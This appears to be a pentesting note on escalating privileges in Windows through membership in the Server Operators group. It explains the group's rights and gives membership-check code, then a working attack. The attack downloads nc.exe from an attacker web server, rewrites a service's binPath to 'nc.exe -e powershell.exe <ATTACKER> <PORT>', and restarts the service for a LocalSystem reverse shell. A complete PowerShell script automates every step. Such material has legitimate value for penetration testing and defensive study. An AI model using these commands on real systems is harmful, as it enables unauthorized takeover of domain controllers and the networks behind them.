PRIMARY CATEGORY → HIGH PRIVILEGED GROUPS
REFERENCES
Windows Privesc: Server Operators Group - See here

The Server Operators group is a built-in Active Directory security group (BUILTIN\Server Operators, SID S-1-5-32-549) and is counted among the so-called privileged groups. By default it has no members.

Its purpose is to let selected users carry out day-to-day administrative tasks on domain controllers without making them members of the Administrators group or Domain Admins.

Among the rights granted to members of this group, the following stand out:

  • Start, stop and restart services
  • Shut down and restart servers, including domain controllers, locally and remotely (SeShutdownPrivilege and SeRemoteShutdownPrivilege)
  • Manage shared resources
  • Back up and restore files on a domain controller (SeBackupPrivilege and SeRestorePrivilege), which in practice means reading any file on disk regardless of its ACL
  • Log on to domain controllers, locally and remotely through administration tools

Local Privilege Escalation

Check Group Membership

Once a shell is obtained on the remote host as a non-privileged user, check whether that user belongs to the Server Operators group:

whoami /groups
net user <USER>

If not, check which domain accounts are members of this group and try to pivot to one of them (Get-ADGroupMember requires the ActiveDirectory PowerShell module to be present on the host):

Get-ADGroupMember -Identity "Server Operators"
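As an added example (not part of the original note), the following PowerShell performs both checks without the ActiveDirectory module: it matches the current token against the well-known SID of BUILTIN\Server Operators and, when the user is not a member, reads the group's member attribute over ADSI/LDAP. The SID S-1-5-32-549 and the CN=Builtin location are standard; the function names and output layout are the example's own.

```powershell
# Added example, not from the original note. Works on any domain-joined host
# without the ActiveDirectory module.
$serverOperatorsSid = 'S-1-5-32-549'   # well-known SID of BUILTIN\Server Operators

function Test-ServerOperator {
    # Token group SIDs of the current logon session: the same data whoami /groups
    # prints. Token groups already include nested memberships.
    $tokenGroups = [System.Security.Principal.WindowsIdentity]::GetCurrent().Groups
    return [bool]($tokenGroups | Where-Object { $_.Value -eq $serverOperatorsSid })
}

function Get-ServerOperatorMembers {
    # Server Operators lives under CN=Builtin of the domain naming context.
    $rootDse  = [ADSI]'LDAP://RootDSE'
    $domainDn = $rootDse.defaultNamingContext
    $group    = [ADSI]"LDAP://CN=Server Operators,CN=Builtin,$domainDn"
    # 'member' holds the DNs of direct members only (users, computers or nested groups).
    foreach ($memberDn in $group.member) {
        $member = [ADSI]"LDAP://$memberDn"
        [pscustomobject]@{
            SamAccountName    = [string]$member.sAMAccountName
            ObjectClass       = [string]($member.objectClass | Select-Object -Last 1)
            DistinguishedName = $memberDn
        }
    }
}

if (Test-ServerOperator) {
    Write-Output 'Current user is a member of Server Operators'
} else {
    Write-Output 'Not a member; direct members of Server Operators:'
    Get-ServerOperatorMembers | Format-Table -AutoSize
}
```

The token check sees nested membership, but the LDAP member attribute lists direct members only, so a nested group returned as ObjectClass "group" has to be expanded separately (on the domain controller itself, net localgroup "Server Operators" does this for you).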

List Available | Running Services

If Evil-WinRM is used to connect to the target over WinRM, its built-in services command lists the installed services together with the path of each service's binary:

services

Choose a non-critical service and repoint its binary path to a netcat binary that the attacker uploads. Two things matter before touching it: sc.exe config only succeeds if the service's DACL grants Server Operators SERVICE_CHANGE_CONFIG (otherwise it fails with access denied, and another service must be chosen), and the original binary path should be noted so it can be restored afterwards. Because the hijacked service keeps running under its configured account (normally LocalSystem), the reverse shell comes back with that account's privileges.

Therefore, proceed as follows →

Upload a Netcat Binary
From the Attacker
python3 -m http.server <PORT>
From the Target
IWR -UseBasicParsing -Uri 'http://<ATTACKER>:<PORT>/nc.exe' -OutFile 'C:\Windows\Temp\nc.exe'

Modify the Binary Path of the Service

Replace the service's binary path with nc.exe plus the arguments that make it send a reverse shell to the attacker machine (the -e option requires a netcat build compiled with it, such as the nc.exe shipped in Kali's windows-binaries). Note the space after binPath=: sc.exe's syntax requires each option name to end in the equal sign, with the value as the following argument.

sc.exe config <SERVICE> binPath= "C:\Windows\Temp\nc.exe -e powershell.exe <ATTACKER> <PORT>"

Stop and Start the Service

Once the service's binary path has been modified, start a listener on the attacker machine and then restart the service. Because nc.exe never reports its status to the Service Control Manager, sc.exe start ends with error 1053 (the service did not respond in a timely fashion) once the start timeout expires, but by then the reverse shell has already connected; if the shell drops when the timeout hits, use it straight away to spawn a second, detached process. Afterwards, restore the original binary path with another sc.exe config so the service is left usable.

From the Attacker
rlwrap -CaR nc -nlvp <PORT>
From the Target
sc.exe stop <SERVICE>
sc.exe start <SERVICE>
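The whole procedure as one added PowerShell example, run from the Evil-WinRM session on the target (this is not the original note's code). The attacker address, ports, service name and staging path at the top are assumed placeholders. Beyond the steps above it records the original binary path first, inspects the service DACL for SERVICE_CHANGE_CONFIG (SDDL right CC) granted to Server Operators (SDDL alias SO), and restores the path at the end. The listener (rlwrap -CaR nc -nlvp <PORT>) and the HTTP server serving nc.exe must already be running on the attacker side.

```powershell
# Added example, not from the original note. Run inside the Evil-WinRM session on
# the target as the Server Operators member. All values below are assumptions.
$Attacker = '10.10.14.5'                 # assumed attacker IP (listener + HTTP server)
$Port     = 4444                         # assumed listener port
$HttpPort = 8000                         # assumed port of python3 -m http.server
$Service  = 'VSS'                        # assumed non-critical service to hijack
$NcPath   = 'C:\Windows\Temp\nc.exe'     # staging path for the uploaded netcat

# 0. Sanity check: the token must carry BUILTIN\Server Operators (S-1-5-32-549).
if (-not (whoami /groups | Select-String -SimpleMatch 'S-1-5-32-549')) {
    throw 'Current user is not a member of Server Operators'
}

function Test-ServiceChangeConfig {
    param([string]$Name)
    # sc.exe sdshow prints the service's security descriptor as SDDL. We need an
    # allow ACE for Server Operators (SDDL alias SO) that carries CC
    # (SERVICE_CHANGE_CONFIG) or GA (generic all). Rights are two-letter codes,
    # so they are compared pairwise instead of with a substring match.
    $sddl = (sc.exe sdshow $Name) -join ''
    foreach ($ace in [regex]::Matches($sddl, '\(A;[^;]*;([A-Z]*);;;SO\)')) {
        $rights = $ace.Groups[1].Value
        $pairs  = for ($i = 0; $i -lt $rights.Length - 1; $i += 2) { $rights.Substring($i, 2) }
        if ($pairs -contains 'CC' -or $pairs -contains 'GA') { return $true }
    }
    return $false
}

# 1. Record the original binary path so the service can be restored afterwards.
$qc = sc.exe qc $Service
$originalBinPath = ($qc | Select-String 'BINARY_PATH_NAME').Line.Split(':', 2)[1].Trim()
Write-Output "Original binPath: $originalBinPath"

# 2. Warn if the DACL does not grant Server Operators the right sc.exe config needs.
if (-not (Test-ServiceChangeConfig -Name $Service)) {
    Write-Warning "$Service does not grant SERVICE_CHANGE_CONFIG to Server Operators; pick another service"
}

# 3. Stage nc.exe from the attacker's web server.
Invoke-WebRequest -UseBasicParsing -Uri "http://${Attacker}:${HttpPort}/nc.exe" -OutFile $NcPath

# 4. Repoint the service. The space after 'binPath=' is required by sc.exe syntax.
sc.exe config $Service binPath= "$NcPath -e powershell.exe $Attacker $Port"

# 5. Restart it. nc.exe never talks to the SCM, so 'start' ends with error 1053
#    after the start timeout, but the reverse shell has connected by then.
sc.exe stop $Service | Out-Null
Start-Sleep -Seconds 3
sc.exe start $Service

# 6. Put the original binary path back so the service is left usable.
sc.exe config $Service binPath= $originalBinPath
```

The DACL check is a warning rather than a hard stop because the Service Control Manager is the authority: if the ACE is missing, step 4 simply fails with access denied and nothing has been changed yet. Step 6 runs after sc.exe start returns, which happens only once the start timeout has elapsed, so the shell is already established when the path is restored.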